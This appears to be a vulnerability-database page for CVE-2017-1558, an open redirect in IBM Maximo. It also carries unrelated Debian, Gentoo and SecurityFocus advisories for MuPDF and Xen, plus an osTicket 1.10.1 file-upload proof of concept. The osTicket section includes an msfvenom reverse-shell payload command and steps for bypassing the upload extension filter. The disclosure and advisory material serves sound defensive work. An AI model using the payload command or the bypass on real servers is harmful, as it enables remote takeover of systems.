CVE-2017-1558
CVSS 5.8
Published: 2017-12-13 13:29:00
Last revised: 2017-12-27 09:11:48

[Original] IBM Maximo Asset Management 7.5 and 7.6 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 131548.


[CNNVD] CNNVD data is not yet available.


[Machine translation] Translation not yet available.

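- CVSS (base score)

CVSS score: 5.8 [MEDIUM]
Confidentiality impact: PARTIAL [likely to result in information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: MEDIUM [exploitation requires certain access conditions]
Attack vector: NETWORK [the attacker needs neither internal network access nor local access]
Authentication: NONE [exploitation requires no authentication]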

- CWE (weakness category)

CWE-601 [URL Redirection to Untrusted Site (Open Redirect)]

- CPE (affected platforms and products)

cpe:/a:ibm:maximo_asset_management:7.5
cpe:/a:ibm:maximo_asset_management:7.6
cpe:/a:ibm:maximo_asset_management_essentials:7.5

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1558
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1558
(Official data source) NVD

- Other links and resources

http://www.ibm.com/support/docview.wss?uid=swg22010595
(VENDOR_ADVISORY)  CONFIRM  http://www.ibm.com/support/docview.wss?uid=swg22010595
http://www.securityfocus.com/bid/102211
(VENDOR_ADVISORY)  BID  102211
https://exchange.xforce.ibmcloud.com/vulnerabilities/131548
(VENDOR_ADVISORY)  MISC  https://exchange.xforce.ibmcloud.com/vulnerabilities/131548

- Vulnerability information (F144739)

Debian Security Advisory 4006-1 (PacketStormID:F144739)
2017-10-25 00:00:00
Debian  debian.org
advisory,denial of service,arbitrary,vulnerability
linux,debian
CVE-2017-14685,CVE-2017-14686,CVE-2017-14687,CVE-2017-15587

Debian Linux Security Advisory 4006-1 - Multiple vulnerabilities have been found in MuPDF, a PDF file viewer, which may result in denial of service or the execution of arbitrary code.


- -------------------------------------------------------------------------
Debian Security Advisory DSA-4006-1                   security@debian.org
https://www.debian.org/security/                                         
October 24, 2017                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : mupdf
CVE ID         : CVE-2017-14685 CVE-2017-14686 CVE-2017-14687 CVE-2017-15587
Debian Bug     : 877379 879055

Multiple vulnerabilities have been found in MuPDF, a PDF file viewer, which
may result in denial of service or the execution of arbitrary code.

CVE-2017-14685, CVE-2017-14686, and CVE-2017-14687

     WangLin discovered that a crafted .xps file can crash MuPDF and
     potentially execute arbitrary code in several ways, since the
     application makes unchecked assumptions on the entry format.

CVE-2017-15587

    Terry Chia and Jeremy Heng discovered an integer overflow that can
    cause arbitrary code execution via a crafted .pdf file.

For the stable distribution (stretch), these problems have been fixed in
version 1.9a+ds1-4+deb9u1.

We recommend that you upgrade your mupdf packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org

- Vulnerability information (F144747)

osTicket 1.10.1 Shell Upload (PacketStormID:F144747)
2017-10-25 00:00:00
Rajwinder Singh  
exploit,remote,shell
CVE-2017-15580

osTicket version 1.10.1 suffers from a remote shell upload vulnerability.

Reference: https://becomepentester.blogspot.ae/2017/10/osTicket-File-Upload-Restrictions-Bypassed-CVE-2017-15580.html

*# Exploit Title: File Upload Restrictions Bypassed*
*# Date: 18 October, 2017*
*# Exploit Author: Rajwinder Singh*
*# Vendor Homepage: http://osticket.com/*
*# Software Link: http://osticket.com/download/go?dl=osTicket-v1.10.1.zip*
*# Version: v1.10.1*
*# CVE : 2017-15580*

Vulnerability Details:
======================
osTicket application provides a functionality to upload 'html' files with
associated formats. However, application does not properly validate the
uploaded file's contents and thus accepts any type of files.

*Proof-of-Concept:*
====================
Uploaded shell to get reverse shell of end user for the demo purpose.

1. Created a valid '.html' file to bypass client-side validations.
<html>
<title>test</title>
<body>
<p>test page</p>
</body>

</html>

2. Created a reverse shell with '.exe' file extension using msfvenom.
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<YOUR
IP> LPORT=4444 -b "\x00" -e <encoder> -f exe -o reverse.exe
https://www.offensive-security.com/metasploit-unleashed/binary-payloads/

3. As shown in the below screenshot, intercepted the request and changed
file extension '.html' to '.exe' and received a valid response from server
along with uploaded malicious file.


<https://3.bp.blogspot.com/-XqKsaTccLvg/WebuXgaRd7I/AAAAAAAANVs/NoWSFi9Mmwol8KxzUJQzyCSonov3yqg6gCLcBGAs/s1600/1.file_upload_extension_bypass.JPG>



*Response:*
<https://4.bp.blogspot.com/-3peKN-VR_os/Webulv3N7aI/AAAAAAAANVw/17FtsSCVNoIxTcEsfUle4VxQKYlQoBAqQCLcBGAs/s1600/2.file_upload_extension_bypass.JPG>

4. As shown in the below screenshot, successfully uploaded malicious file
on the server.
<https://4.bp.blogspot.com/-lH2vbsUDKZQ/Webu0WOio-I/AAAAAAAANV0/Jl8KFD0cHZsinpENfc1hV8OaDtcH1P0YQCLcBGAs/s1600/3.file_upload_extension_bypass.JPG>

Ready to get reverse shell.

*Affected Component:*
====================
*Parameter:* tickets.php?id=<ticket_number>#reply


*Disclosure Timeline:*
=====================
Vendor Confirmation: 11 October, 2017
Mitre Notification: 17 October, 2017
Public Disclosure: 18 October, 2017

*Exploitation Technique:*
=======================
Remote

*Severity Level:*
================
High

*Description:*
=====================================================
Request Method(s): [+] POST
Vulnerable Product: [+] osTicket - v1.10.1
Vulnerable Parameter(s): [+] tickets.php?id=<ticket_number>#reply



Thank you
    

- Vulnerability information (F144971)

Debian Security Advisory 4006-2 (PacketStormID:F144971)
2017-11-10 00:00:00
Debian  debian.org
advisory
linux,debian
CVE-2017-15587

Debian Linux Security Advisory 4006-2 - It was discovered that the original patch applied for CVE-2017-15587 in DSA-4006-1 was incomplete. Updated packages are now available to address this problem.


- -------------------------------------------------------------------------
Debian Security Advisory DSA-4006-2                   security@debian.org
https://www.debian.org/security/                                         
November 10, 2017                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : mupdf
CVE ID         : CVE-2017-15587
Debian Bug     : 879055

It was discovered that the original patch applied for CVE-2017-15587
in DSA-4006-1 was incomplete. Updated packages are now available to
address this problem. For reference, the relevant part of the original
advisory text follows.

CVE-2017-15587

    Terry Chia and Jeremy Heng discovered an integer overflow that can
    cause arbitrary code execution via a crafted .pdf file.

For the oldstable distribution (jessie), this problem has been fixed
in version 1.5-1+deb8u3.

For the stable distribution (stretch), this problem has been fixed in
version 1.9a+ds1-4+deb9u2.

We recommend that you upgrade your mupdf packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org

- Vulnerability information (F145156)

Debian Security Advisory 4050-1 (PacketStormID:F145156)
2017-11-29 00:00:00
Debian  debian.org
advisory,denial of service,arbitrary,vulnerability
linux,debian
CVE-2017-14316,CVE-2017-14317,CVE-2017-14318,CVE-2017-14319,CVE-2017-15588,CVE-2017-15589,CVE-2017-15590,CVE-2017-15592,CVE-2017-15593,CVE-2017-15594,CVE-2017-15595,CVE-2017-15597

Debian Linux Security Advisory 4050-1 - Multiple vulnerabilities have been discovered in the Xen hypervisor, which could result in denial of service, information leaks, privilege escalation or the execution of arbitrary code.


- -------------------------------------------------------------------------
Debian Security Advisory DSA-4050-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
November 28, 2017                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : xen
CVE ID         : CVE-2017-14316 CVE-2017-14317 CVE-2017-14318 CVE-2017-14319 
                 CVE-2017-15588 CVE-2017-15589 CVE-2017-15590 CVE-2017-15592 
                 CVE-2017-15593 CVE-2017-15594 CVE-2017-15595 CVE-2017-15597

Multiple vulnerabilities have been discovered in the Xen hypervisor, which
could result in denial of service, information leaks, privilege escalation
or the execution of arbitrary code.

For the oldstable distribution (jessie) a separate update will be
released.

For the stable distribution (stretch), these problems have been fixed in
version 4.8.2+xsa245-0+deb9u1.

We recommend that you upgrade your xen packages.

For the detailed security status of xen please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/xen

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org

- Vulnerability information (F145894)

Gentoo Linux Security Advisory 201801-14 (PacketStormID:F145894)
2018-01-15 00:00:00
Gentoo  security.gentoo.org
advisory,vulnerability
linux,gentoo
CVE-2017-12134,CVE-2017-12135,CVE-2017-12136,CVE-2017-12137,CVE-2017-15588,CVE-2017-15589,CVE-2017-15590,CVE-2017-15591,CVE-2017-15592,CVE-2017-15593,CVE-2017-15594,CVE-2017-15595,CVE-2017-17044,CVE-2017-17045,CVE-2017-17046,CVE-2017-17563,CVE-2017-17564,CVE-2017-17565,CVE-2017-17566

Gentoo Linux Security Advisory 201801-14 - Multiple vulnerabilities have been found in Xen, the worst of which could allow for privilege escalation. Versions less than 4.9.1-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 201801-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High
    Title: Xen: Multiple vulnerabilities
     Date: January 14, 2018
     Bugs: #627962, #634668, #637540, #637542, #639688, #641566
       ID: 201801-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been found in Xen, the worst of which
could allow for privilege escalation.

Background
==========

Xen is a bare-metal hypervisor.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  app-emulation/xen           < 4.9.1-r1               >= 4.9.1-r1
  2  app-emulation/xen-tools     < 4.9.1-r1               >= 4.9.1-r1
    -------------------------------------------------------------------
     2 affected packages

Description
===========

Multiple vulnerabilities have been discovered in Xen. Please review the
referenced CVE identifiers for details.

Impact
======

A local attacker could potentially execute arbitrary code with the
privileges of the Xen (QEMU) process on the host, gain privileges on
the host system, or cause a Denial of Service condition.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Xen users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=app-emulation/xen-4.9.1-r1"

All Xen tools users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot -v ">=app-emulation/xen-tools-4.9.1-r1"

References
==========

[  1 ] CVE-2017-12134
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-12134
[  2 ] CVE-2017-12135
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-12135
[  3 ] CVE-2017-12136
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-12136
[  4 ] CVE-2017-12137
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-12137
[  5 ] CVE-2017-15588
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-15588
[  6 ] CVE-2017-15589
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-15589
[  7 ] CVE-2017-15590
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-15590
[  8 ] CVE-2017-15591
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-15591
[  9 ] CVE-2017-15592
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-15592
[ 10 ] CVE-2017-15593
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-15593
[ 11 ] CVE-2017-15594
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-15594
[ 12 ] CVE-2017-15595
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-15595
[ 13 ] CVE-2017-17044
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-17044
[ 14 ] CVE-2017-17045
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-17045
[ 15 ] CVE-2017-17046
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-17046
[ 16 ] CVE-2017-17563
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-17563
[ 17 ] CVE-2017-17564
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-17564
[ 18 ] CVE-2017-17565
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-17565
[ 19 ] CVE-2017-17566
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-17566

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 https://security.gentoo.org/glsa/201801-14

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2018 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



- Vulnerability information

Xen CVE-2017-15589 Information Disclosure Vulnerability
Design Error 101496
Yes No
2017-10-18 12:00:00 2017-10-18 12:00:00
Roger Pau Monné of Citrix.

- Affected software versions

Xen Xen 4.9
Redhat Enterprise Linux 5

- Vulnerability discussion

Xen is prone to an information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.

Xen through 4.9.x are vulnerable; other versions may also be affected.

- Exploit

Currently, we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Solution

Updates are available. Please see the references or vendor advisory for more information.
